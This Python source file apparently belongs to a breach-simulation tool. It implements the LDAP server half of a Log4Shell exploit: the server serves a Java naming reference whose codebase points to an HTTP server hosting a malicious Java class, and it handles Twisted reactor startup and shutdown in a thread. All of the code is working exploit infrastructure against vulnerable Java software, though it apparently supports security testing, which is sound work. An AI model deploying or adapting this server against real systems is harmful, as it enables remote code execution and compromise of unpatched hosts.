import logging
import math
import tempfile
import time
from pathlib import Path
from threading import Event, Thread, current_thread
from typing import Optional

from ldaptor.protocols.ldap.ldapserver import LDAPServer
from twisted.internet import reactor
from twisted.internet.protocol import ServerFactory

from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.utils.code_utils import insecure_generate_random_string

# WARNING: It was observed that this LDAP server would raise an exception and fail to start if
#          multiple Python threads attempted to start multiple LDAP servers simultaneously. It was
#          thought that, since each LDAP server was started in its own process, there would be no
#          issue; however, this was not the case. It seems that something in some of the twisted
#          imports is not thread- or multiprocess-safe. Moving the twisted imports down into the
#          functions where they are required, instead of importing them at the top of this file,
#          appears to resolve the issue. NOTE: `reactor`, `ServerFactory` and `LDAPServer` are
#          currently still imported at module level above.

logger = logging.getLogger(__name__)

# Relative distinguished name of the single entry added to the LDAP tree; it references the
# malicious Java class served over HTTP.
EXPLOIT_RDN: str = "dn=Exploit"

# Upper bound, in seconds, on how long run() waits for the Twisted reactor to report that it is
# running. It also bounds how long the startup poller keeps checking.
REACTOR_START_TIMEOUT_SEC: float = 30.0


class LDAPServerStartError(Exception):
    """Raised by LDAPExploitServer.run() when the LDAP exploit server could not be started."""


class Tree:
    """
    The LDAP directory information tree (DIT) served while exploiting log4shell.

    The tree lives in a freshly created temporary directory under `storage_dir` and holds one entry,
    EXPLOIT_RDN. That entry is a Java naming reference whose codebase points at the HTTP server.

    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    def __init__(self, http_server_ip: str, http_server_port: int, storage_dir: Path):
        """
        :param http_server_ip: IP address of the HTTP server that serves the Java class.
        :param http_server_port: Port the HTTP server listens on.
        :param storage_dir: Parent directory in which the tree's temporary directory is created.
        """
        from ldaptor.ldiftree import LDIFTreeEntry

        # mkdtemp creates a new, uniquely named directory and returns its path
        self.path = tempfile.mkdtemp(dir=storage_dir, prefix="log4shell", suffix=".ldap")
        self.db = LDIFTreeEntry(self.path)
        self._init_db(http_server_ip, http_server_port)

    def _init_db(self, http_server_ip: str, http_server_port: int):
        """Add the EXPLOIT_RDN entry, whose javaCodeBase is the HTTP server's root URL."""
        exploit_class_name = "Exploit"
        code_base_url = f"http://{http_server_ip}:{http_server_port}/"

        self.db.addChild(
            EXPLOIT_RDN,
            {
                "javaFactory": [exploit_class_name],
                "objectClass": ["javaNamingReference"],
                "javaCodeBase": [code_base_url],
                "javaClassName": [exploit_class_name],
            },
        )


class LDAPServerFactory(ServerFactory):
    """
    Twisted server factory that builds LDAPServer protocols and persistently holds the LDAP tree.

    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    protocol = LDAPServer

    # Copied onto every protocol built by buildProtocol(). Declared here so that buildProtocol()
    # works even when the caller never assigns `factory.debug`. Without this default it would
    # raise AttributeError, because __init__ does not set it.
    debug = False

    def __init__(self, root):
        """
        :param root: The root entry of the LDAP tree that built protocols will serve.
        """
        self.root = root

    def buildProtocol(self, addr):
        """
        Create a protocol instance for a new connection.

        :param addr: The address of the connecting peer (unused).
        :return: A `self.protocol` instance with `debug` and `factory` set from this factory.
        """
        proto = self.protocol()
        proto.debug = self.debug
        proto.factory = self
        return proto


class LDAPExploitServer:
    """
    This class wraps the creation of an Ldaptor LDAP server that is used to exploit log4shell.
    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    def __init__(
        self, ldap_server_port: int, http_server_ip: str, http_server_port: int, storage_dir: Path
    ):
        """
        :param ldap_server_port: The port that the LDAP server will listen on.

        :param http_server_ip: The IP address of the HTTP server that serves the malicious Log4Shell
                               Java class.

        :param http_server_port: The port the HTTP server is listening on.

        :param storage_dir: A directory where the LDAP server can safely store files it needs during
                            runtime.
        """

        # Set when the reactor reports that it is running, or when starting it failed. In the
        # failure case `_startup_error` is populated before the event is set. run() blocks on it.
        self._reactor_startup_completed = Event()
        self._ldap_server_port = ldap_server_port
        self._http_server_ip = http_server_ip
        self._http_server_port = http_server_port
        self._storage_dir = storage_dir
        self._server_thread: Optional[Thread] = None
        # The exception raised while configuring or running the reactor, if any
        self._startup_error: Optional[Exception] = None

    def run(self):
        """
        Runs the Log4Shell LDAP exploit server in a thread. This method attempts to start the
        server and blocks until one of three things happens: the server has started, starting it
        has failed, or it times out.

        :raises LDAPServerStartError: Indicates there was a problem starting the LDAP server. If
                                      the server thread raised an exception, that exception is
                                      chained as the cause.
        """
        logger.info("Starting LDAP exploit server")

        # A Twisted reactor can only be started and stopped once; it cannot be restarted after it
        # has been stopped. The reactor used to be configured and run in a separate process to
        # work around this. That is no longer needed because the Log4Shell exploiter is a plugin,
        # and plugins run in their own processes. The reactor now runs in a daemon thread.
        self._server_thread = Thread(
            name=f"{current_thread().name}-LDAPServer-{insecure_generate_random_string(n=8)}",
            target=self._run_twisted_reactor,
            daemon=True,
        )

        self._server_thread.start()
        startup_finished = self._reactor_startup_completed.wait(REACTOR_START_TIMEOUT_SEC)

        if self._startup_error is not None:
            # The server thread returns right after reporting the error, so there is nothing to
            # stop here; surface the real cause instead of an "unknown error".
            raise LDAPServerStartError(
                f"The LDAP server failed to start: {self._startup_error}"
            ) from self._startup_error

        if not startup_finished:
            logger.error("The LDAP server failed to start, stopping the server thread...")
            self.stop(timeout=LONG_REQUEST_TIMEOUT)
            raise LDAPServerStartError("An unknown error prevented the LDAP server from starting")

        logger.debug("The LDAP exploit server has successfully started")

    def _run_twisted_reactor(self):
        """
        Server-thread entry point: configure the reactor, then run it until it is stopped.

        Any exception is logged and stored in `_startup_error`, and `_reactor_startup_completed`
        is set. This lets run() fail immediately instead of waiting out REACTOR_START_TIMEOUT_SEC.
        """
        # TODO: Try importing reactor at top level when Log4Shell is plugin

        logger.debug("Starting log4shell LDAP server on port %s", self._ldap_server_port)
        try:
            self._configure_twisted_reactor()

            # reactor.run() blocks, so a separate thread polls `reactor.running` and sets the
            # self._reactor_startup_completed Event once the reactor is running. This allows
            # run() to block until the reactor has successfully started.
            Thread(target=self._check_if_reactor_startup_completed, daemon=True).start()
            reactor.run(installSignalHandlers=False)
        except Exception as err:
            # Without this, errors such as listenTCP() failing to bind the port would kill this
            # thread and leave run() blocked for the whole startup timeout.
            logger.exception("An error prevented the LDAP exploit server from running")
            self._startup_error = err
            self._reactor_startup_completed.set()
            return

        logger.debug("Control returned from twisted to LDAPExploitServer")
        logger.debug("Exiting twisted process")

    def _check_if_reactor_startup_completed(self):
        """
        Poll `reactor.running` every 0.25 seconds for up to REACTOR_START_TIMEOUT_SEC. Set
        `_reactor_startup_completed` as soon as the reactor reports that it is running.
        """
        check_interval_sec = 0.25
        num_checks = math.ceil(REACTOR_START_TIMEOUT_SEC / check_interval_sec)

        for _ in range(num_checks):
            if reactor.running:
                logger.debug("Twisted reactor startup completed")
                self._reactor_startup_completed.set()
                break

            logger.debug("Twisted reactor has not yet started")
            time.sleep(check_interval_sec)

    def _configure_twisted_reactor(self):
        """
        Build the exploit LDAP tree and make the reactor listen for LDAP connections on
        `self._ldap_server_port`. Exceptions from the steps below are not caught here.
        """
        from ldaptor.interfaces import IConnectedLDAPEntry
        from twisted.python.components import registerAdapter

        LDAPExploitServer._output_twisted_logs_to_python_logger()

        # Adapt an LDAPServerFactory to IConnectedLDAPEntry by returning its root tree, as in
        # the ldaptor cookbook example this code is based on.
        registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry)

        tree = Tree(self._http_server_ip, self._http_server_port, self._storage_dir)
        factory = LDAPServerFactory(tree.db)
        factory.debug = True

        reactor.listenTCP(self._ldap_server_port, factory)

    @staticmethod
    def _output_twisted_logs_to_python_logger():
        """Route Twisted's log output through the standard Python logging module."""
        from twisted.python import log

        # https://twistedmatrix.com/documents/current/api/twisted.python.log.PythonLoggingObserver.html
        log_observer = log.PythonLoggingObserver()
        log_observer.start()

    def stop(self, timeout: Optional[float] = None):
        """
        Stops the LDAP server.

        :param timeout: A floating point number of seconds to wait for the server to stop. If this
                        argument is None (the default), the method blocks until the LDAP server
                        terminates. If `timeout` is a positive floating point number, this method
                        blocks for at most `timeout` seconds.
        """
        if self._server_thread is None:
            return

        if self._server_thread.is_alive():
            logger.debug("Stopping LDAP exploit server")

            # reactor.stop() must run in the reactor's own thread
            reactor.callFromThread(reactor.stop)
            self._server_thread.join(timeout)

            if self._server_thread.is_alive():
                logger.warning(
                    "Timed out while waiting for the LDAP exploit server to stop, "
                    "it will stop when the parent process terminates"
                )
            else:
                logger.debug("Successfully stopped the LDAP exploit server")
